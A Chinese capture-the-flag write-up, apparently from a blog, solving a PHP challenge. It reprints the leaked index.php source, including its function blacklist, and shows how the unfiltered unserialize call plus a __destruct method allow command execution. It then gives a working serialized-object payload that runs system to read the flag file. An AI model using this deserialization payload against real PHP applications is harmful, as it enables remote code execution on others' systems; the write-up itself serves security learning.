点进题目之后就是天皇(bushi的图片,查看源码,程序设置了一个计时器,每5s提交一次表单:
<form id=form1 name=form1 action="index.php" method=post><input type=hidden id=func name=func value='date'><input type=hidden id=p name=p value='Y-m-d h:i:s a'>
从字段意思来看,后天调用func,p作为参数传入。
尝试直接system执行命令,但是发现被过滤了
于是选择使用file_get_contents来读取index.php的内容:
<?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {return $result;} else {return "";}}class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {$func = strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die("Hacker...");}}?>
基本上逻辑和猜测的差不多,但是发现有一个类Test,而且注意到上面并没有过滤unserialize函数,并且类中的__destruct函数调用gettime时没有过滤,那么只需要调用unserialize函数,并且p传入构造好的序列化字符串,就可以成功getshell。
payload:
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
最后没想到的是flag藏在tmp下面,也没个提示。。。
若有收获,就点个赞吧
0 人点赞
